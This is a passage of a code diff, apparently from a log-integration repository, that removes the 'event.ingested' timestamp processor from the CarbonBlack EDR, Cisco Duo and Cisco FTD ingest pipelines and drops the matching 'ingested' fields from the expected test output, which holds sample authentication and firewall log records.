- "ingested": "2022-01-25T07:41:27.120934840Z", "kind": "event", "type": [ "change" @@ -2700,7 +2642,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120935574Z", "kind": "event", "type": [ "info" @@ -2738,7 +2679,6 @@ "process", "driver" ], - "ingested": "2022-01-25T07:41:27.120936332Z", "kind": "event", "type": [ "info" @@ -2779,7 +2719,6 @@ "category": [ "host" ], - "ingested": "2022-01-25T07:41:27.120937079Z", "kind": "event", "type": [ "info" @@ -2823,7 +2762,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120937819Z", "kind": "event" }, "observer": { @@ -2869,7 +2807,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120938554Z", "kind": "event", "type": [ "start", @@ -2914,7 +2851,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120939281Z", "kind": "event", "type": [ "info" @@ -2964,7 +2900,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120940044Z", "kind": "event", "type": [ "connection", @@ -3003,7 +2938,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120940836Z", "kind": "event" }, "host": { @@ -3054,7 +2988,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120941579Z", "kind": "event", "type": [ "info" @@ -3102,7 +3035,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120942319Z", "kind": "event", "type": [ "change" @@ -3140,7 +3072,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120943044Z", "kind": "event", "type": [ "info" @@ -3178,7 +3109,6 @@ "process", "driver" ], - "ingested": "2022-01-25T07:41:27.120943775Z", "kind": "event", "type": [ "info" @@ -3219,7 +3149,6 @@ "category": [ "host" ], - "ingested": "2022-01-25T07:41:27.120944504Z", "kind": "event", "type": [ "info" @@ -3263,7 +3192,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120945269Z", "kind": "event" }, "observer": { @@ -3309,7 +3237,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120946004Z", "kind": "event", "type": [ "start", @@ -3354,7 +3281,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120946729Z", "kind": "event", "type": [ "info" @@ -3405,7 +3331,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120947572Z", "kind": "event", "type": [ "connection", @@ -3437,7 +3362,6 @@ }, "event": { "action": "unknown", - "ingested": "2022-01-25T07:41:27.120948375Z", "kind": "event" }, "file": { @@ -3489,7 +3413,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120949110Z", "kind": "event", "type": [ "info" @@ -3537,7 +3460,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120949847Z", "kind": "event", "type": [ "change" @@ -3589,7 +3511,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120950586Z", "kind": "event", "type": [ "start", @@ -3628,7 +3549,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120951314Z", "kind": "event", "type": [ "info" @@ -3666,7 +3586,6 @@ "process", "driver" ], - "ingested": "2022-01-25T07:41:27.120952094Z", "kind": "event", "type": [ "info" @@ -3711,7 +3630,6 @@ "category": [ "host" ], - "ingested": "2022-01-25T07:41:27.120952826Z", "kind": "event", "type": [ "info" @@ -3755,7 +3673,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120953567Z", "kind": "event" }, "observer": { @@ -3801,7 +3718,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120954304Z", "kind": "event", "type": [ "start", @@ -3846,7 +3762,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120955059Z", "kind": "event", "type": [ "info" @@ -3896,7 +3811,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120955786Z", "kind": "event", "type": [ "connection", @@ -3940,7 +3854,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120956684Z", "kind": "event", "type": [ "change" @@ -3995,7 +3908,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120957412Z", "kind": "event", "type": [ "info" @@ -4043,7 +3955,6 @@ "category": [ "registry" ], - "ingested": "2022-01-25T07:41:27.120958161Z", "kind": "event", "type": [ "change" @@ -4095,7 +4006,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120958921Z", "kind": "event", "type": [ "start", @@ -4134,7 +4044,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120959660Z", "kind": "event", "type": [ "info" @@ -4184,7 +4093,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120960564Z", "kind": "event", "type": [ "change" @@ -4225,7 +4133,6 @@ "category": [ "host" ], - "ingested": "2022-01-25T07:41:27.120961317Z", "kind": "event", "type": [ "info" @@ -4269,7 +4176,6 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2022-01-25T07:41:27.120962051Z", "kind": "event" }, "observer": { @@ -4315,7 +4221,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120962806Z", "kind": "event", "type": [ "start", @@ -4360,7 +4265,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120963537Z", "kind": "event", "type": [ "info" @@ -4410,7 +4314,6 @@ "category": [ "network" ], - "ingested": "2022-01-25T07:41:27.120964289Z", "kind": "event", "type": [ "connection", @@ -4456,7 +4359,6 @@ "category": [ "file" ], - "ingested": "2022-01-25T07:41:27.120965089Z", "kind": "event", "type": [ "change" @@ -4508,7 +4410,6 @@ "category": [ "process" ], - "ingested": "2022-01-25T07:41:27.120965822Z", "kind": "event", "type": [ "info" diff --git a/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml index a10ab732a9e..aec93b30b72 100644 --- a/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/carbonblack_edr/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -1,10 +1,6 @@ --- description: Pipeline for parsing CarbonBlack EDR logs processors: -- set: - field: event.ingested - value: '{{_ingest.timestamp}}' - - set: field: ecs.version value: 8.2.0 diff --git a/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json b/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json index 2a24c4b898e..75228da11a2 100644 --- a/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json +++ b/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json @@ -7,7 +7,6 @@ }, "event": { "action": "activation_begin", - "ingested": "2021-12-29T09:37:47.270933529Z", "original": "{\"action\":\"activation_begin\",\"description\":null,\"isotimestamp\":\"2021-07-20T11: 41: 31+00: 00\",\"object\":null,\"timestamp\":1626781291,\"username\":\"narroway\"}", "kind": "event", "outcome": "success" @@ -33,7 +32,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:47.270944711Z", "original": "{\"action\":\"admin_activate_duo_push\",\"description\":\"{\\\"number\\\": \\\"+12345678901\\\", \\\"extension\\\": \\\"\\\"}\",\"isotimestamp\":\"2021-07-20T11:44:37+00:00\",\"object\":\"940-967-2177\",\"timestamp\":1626781477,\"username\":\"\"}", "kind": "event", "action": "admin_activate_duo_push", @@ -69,7 +67,6 @@ "event": { "reason": "Starting activation process", "action": "activation_begin", - "ingested": "2021-12-29T09:37:47.270947855Z", "original": "{\"action\":\"activation_begin\",\"description\":\"Starting activation process\",\"isotimestamp\":\"2021-07-20T11: 41: 31+00: 00\",\"object\":null,\"timestamp\":1626781291,\"username\":\"narroway\"}", "kind": "event", "outcome": "success" @@ -97,7 +94,6 @@ }, "event": { "action": "activation_set_password", - "ingested": "2021-12-29T09:37:47.270948731Z", "original": "{\"action\":\"activation_set_password\",\"description\":null,\"isotimestamp\":\"2021-07-20T11: 44: 09+00: 00\",\"object\":\"narroway\",\"timestamp\":1626781449,\"username\":\"narroway\"}", "kind": "event", "outcome": "success" @@ -127,7 +123,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:47.270949599Z", "original": "{\"action\":\"admin_self_activate\",\"description\":\"{\\\"name\\\": \\\"narroway\\\", \\\"phone\\\": \\\"+12345678901\\\", \\\"is_temporary_password\\\": false, \\\"email\\\": \\\"narroway@example.com\\\", \\\"hardtoken\\\": null, \\\"role\\\": \\\"Owner\\\", \\\"status\\\": \\\"Pending Activation\\\", \\\"restricted_by_admin_units\\\": false, \\\"administrative_units\\\": \\\"\\\"}\",\"isotimestamp\":\"2021-07-20T11:44:37+00:00\",\"object\":\"jsmith\",\"timestamp\":1626781477,\"username\":\"narroway\"}", "kind": "event", "action": "admin_self_activate", @@ -172,7 +167,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:47.270950423Z", "original": "{\"action\":\"admin_update\",\"description\":\"{\\\"phone\\\": \\\"+451234567890\\\"}\",\"isotimestamp\":\"2021-07-20T11:45:11+00:00\",\"object\":\"narroway\",\"timestamp\":1626781511,\"username\":\"narroway\"}", "kind": "event", "action": "admin_update", @@ -211,7 +205,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:47.270951256Z", "original": "{\"action\":\"user_update\",\"description\":\"{\\\"realname\\\": \\\"test 4\\\", \\\"Sync Ref. Code\\\": \\\"41c7e5714a91d17dea11157539d5d1ac\\\"}\",\"isotimestamp\":\"2021-07-20T11:45:11+00:00\",\"object\":\"narroway\",\"timestamp\":1626781511,\"username\":\"narroway\"}", "kind": "event", "action": "user_update", @@ -254,7 +247,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:47.270952063Z", "original": "{\"action\":\"user_update\",\"description\":\"{\\\"email\\\": \\\"narroway@example.com\\\", \\\"Sync Ref. Code\\\": \\\"41c7e5714a91d17dea11157539d5d1ac\\\"}\",\"isotimestamp\":\"2021-07-20T11:45:11+00:00\",\"object\":\"narroway\",\"timestamp\":1626781511,\"username\":\"narroway\"}", "kind": "event", "action": "user_update", diff --git a/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml index dcbe5374d7f..a04630fdb1e 100644 --- a/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/admin/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for parsing cisco_duo administrator logs processors: - - set: - field: event.ingested - value: "{{{_ingest.timestamp}}}" - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json index e81ad507f86..06b94ca0551 100644 --- a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json +++ b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json @@ -46,7 +46,6 @@ }, "event": { "reason": "user_approved", - "ingested": "2021-12-29T09:37:48.755124421Z", "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"67.0.3396.99\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":true,\"is_firewall_enabled\":true,\"is_password_set\":true,\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Mac OS X\",\"os_version\":\"10.14.1\",\"security_agents\":[]},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Microsoft Azure Active Directory\"},\"auth_device\":{\"ip\":\"192.168.225.254\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"My iPhone X (734-555-2342)\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2020-02-13T18:56:20.351346+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1581620180,\"trusted_endpoint_status\":\"not trusted\",\"txid\":\"340a23e3-23f3-23c1-87dc-1491a23dfdbb\",\"user\":{\"groups\":[\"Duo Users\",\"CorpHQ Users\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway@example.com\"}}", "kind": "event", "category": "authentication", @@ -151,7 +150,6 @@ }, "event": { "reason": "user_approved", - "ingested": "2021-12-29T09:37:48.755127038Z", "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:21:51.271776+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1627024911,\"txid\":\"fa59a691-9139-43e9-9854-f9e1dbf72af5\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", "kind": "event", "category": "authentication", @@ -273,7 +271,6 @@ }, "event": { "reason": "user_approved", - "ingested": "2021-12-29T09:37:48.755127957Z", "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.131\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"narroway@example.com\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-08-12T09:14:23.060168+00:00\",\"ood_software\":null,\"reason\":\"user_approved\",\"result\":\"success\",\"timestamp\":1628759663,\"txid\":\"861a81e7-1f60-4865-95eb-57d9c43ce073\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", "kind": "event", "category": "authentication", @@ -394,7 +391,6 @@ }, "event": { "reason": "user_marked_fraud", - "ingested": "2021-12-29T09:37:48.755128760Z", "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:20:54.700050+00:00\",\"ood_software\":null,\"reason\":\"user_marked_fraud\",\"result\":\"fraud\",\"timestamp\":1627024854,\"txid\":\"78e1a910-350b-4226-828b-edb0ac2f2e3c\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", "kind": "event", "category": "authentication", @@ -513,7 +509,6 @@ }, "event": { "reason": "user_mistake", - "ingested": "2021-12-29T09:37:48.755129544Z", "original": "{\"access_device\":{\"browser\":\"Chrome\",\"browser_version\":\"92.0.4515.107\",\"flash_version\":\"uninstalled\",\"hostname\":null,\"ip\":\"89.160.20.156\",\"is_encryption_enabled\":\"unknown\",\"is_firewall_enabled\":\"unknown\",\"is_password_set\":\"unknown\",\"java_version\":\"uninstalled\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"os\":\"Windows\",\"os_version\":\"10\"},\"alias\":\"\",\"application\":{\"key\":\"DIY231J8BR23QK4UKBY8\",\"name\":\"Duo Access Gateway Launcher\"},\"auth_device\":{\"ip\":\"89.160.20.156\",\"location\":{\"city\":\"Ann Arbor\",\"country\":\"United States\",\"state\":\"Michigan\"},\"name\":\"+91 12345 12345\"},\"email\":\"\",\"event_type\":\"authentication\",\"factor\":\"duo_push\",\"isotimestamp\":\"2021-07-23T07:19:34.702203+00:00\",\"ood_software\":null,\"reason\":\"user_mistake\",\"result\":\"denied\",\"timestamp\":1627024774,\"txid\":\"e22120cd-7388-424f-aa0a-b60cad42d8f3\",\"user\":{\"groups\":[\"AD Sync\"],\"key\":\"DU3KC77WJ06Y5HIV7XKQ\",\"name\":\"narroway\"}}", "kind": "event", "category": "authentication", diff --git a/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml index 3e28b25521b..0d9a3bbece6 100644 --- a/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/auth/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for parsing cisco_duo authentication logs processors: - - set: - field: event.ingested - value: "{{{_ingest.timestamp}}}" - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json b/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json index d0c1e3cf4f2..9194ba9a93b 100644 --- a/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json +++ b/packages/cisco_duo/data_stream/offline_enrollment/_dev/test/pipeline/test-offline-enrollment.log-expected.json @@ -6,7 +6,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:52.266080492Z", "original": "{\"action\": \"o2fa_user_provisioned\",\"description\": \"{\\\"user_agent\\\": \\\"DuoCredProv/4.0.6.413 (Windows NT 6.3.9600; x64; Server)\\\", \\\"hostname\\\": \\\"WKSW10x64\\\", \\\"factor\\\": \\\"duo_otp\\\"}\",\"isotimestamp\": \"2019-08-30T16:10:05+00:00\",\"object\": \"Acme Laptop Windows Logon\",\"timestamp\": 1567181405,\"username\": \"narroway\"}" }, "user": { diff --git a/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml index 755b4a4013c..929f83a3ff7 100644 --- a/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/offline_enrollment/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for parsing cisco_duo offline enrollment logs processors: - - set: - field: event.ingested - value: "{{{_ingest.timestamp}}}" - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json b/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json index 612fc2e848f..7fbaf55f25c 100644 --- a/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json +++ b/packages/cisco_duo/data_stream/summary/_dev/test/pipeline/test-summary.log-expected.json @@ -6,7 +6,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:52.958306807Z", "original": "{\"response\":{\"admin_count\":6,\"integration_count\":5,\"telephony_credits_remaining\":473,\"user_count\":4},\"stat\":\"OK\"}" }, "tags": [ @@ -27,7 +26,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:52.958309870Z", "original": "{\"response\":{\"admin_count\":3,\"integration_count\":9,\"telephony_credits_remaining\":960,\"user_count\":8},\"stat\":\"OK\"}" }, "tags": [ diff --git a/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml index c39d30bf54b..89fe7b88015 100644 --- a/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/summary/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for parsing cisco_duo summary logs processors: - - set: - field: event.ingested - value: "{{{_ingest.timestamp}}}" - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json b/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json index 1fec8c77f96..c174665f093 100644 --- a/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json +++ b/packages/cisco_duo/data_stream/telephony/_dev/test/pipeline/test-telephony.log-expected.json @@ -6,7 +6,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:53.175332756Z", "kind": "event", "original": "{\"context\":\"administrator login\",\"credits\":5,\"isotimestamp\":\"2021-07-22T12:59:30+00:00\",\"phone\":\"+121234512345\",\"timestamp\":1626958770,\"type\":\"phone\"}" }, @@ -28,7 +27,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:53.175335209Z", "kind": "event", "original": "{\"context\":\"verify\",\"credits\":1,\"isotimestamp\":\"2021-08-16T06:03:32+00:00\",\"phone\":\"+121234512345\",\"timestamp\":1629093812,\"type\":\"sms\"}" }, @@ -50,7 +48,6 @@ "version": "8.2.0" }, "event": { - "ingested": "2021-12-29T09:37:53.175336142Z", "kind": "event", "original": "{\"context\": \"authentication\",\"credits\": 1,\"isotimestamp\":\"2020-03-20T15:38:12+00:00\",\"phone\":\"+121234512345\",\"timestamp\":1584718692,\"type\":\"sms\"}" }, diff --git a/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml index 1dff8344ee3..652f4fc4ff6 100644 --- a/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_duo/data_stream/telephony/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for parsing cisco_duo telephony logs processors: - - set: - field: event.ingested - value: "{{{_ingest.timestamp}}}" - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json index 06707472aa0..e2ff47949be 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -57,7 +57,6 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-29T09:58:05.081546387Z", "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)", "code": "302016", "kind": "event", @@ -134,7 +133,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:05.081548856Z", "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -203,7 +201,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:05.081549868Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]", "code": "106023", "kind": "event", @@ -279,7 +276,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:05.081550692Z", "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -340,7 +336,6 @@ }, "event": { "severity": 2, - "ingested": "2021-12-29T09:58:05.081551643Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123", "code": "106017", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json index 57dd8d150ca..ecf8868db4b 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json @@ -59,7 +59,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009015540Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", @@ -138,7 +137,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.009018852Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", @@ -224,7 +222,6 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009019985Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", @@ -309,7 +306,6 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009020995Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", @@ -394,7 +390,6 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009021974Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", @@ -479,7 +474,6 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009023083Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", @@ -564,7 +558,6 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009024070Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", @@ -649,7 +642,6 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009025037Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", @@ -734,7 +726,6 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-29T09:58:07.009026026Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 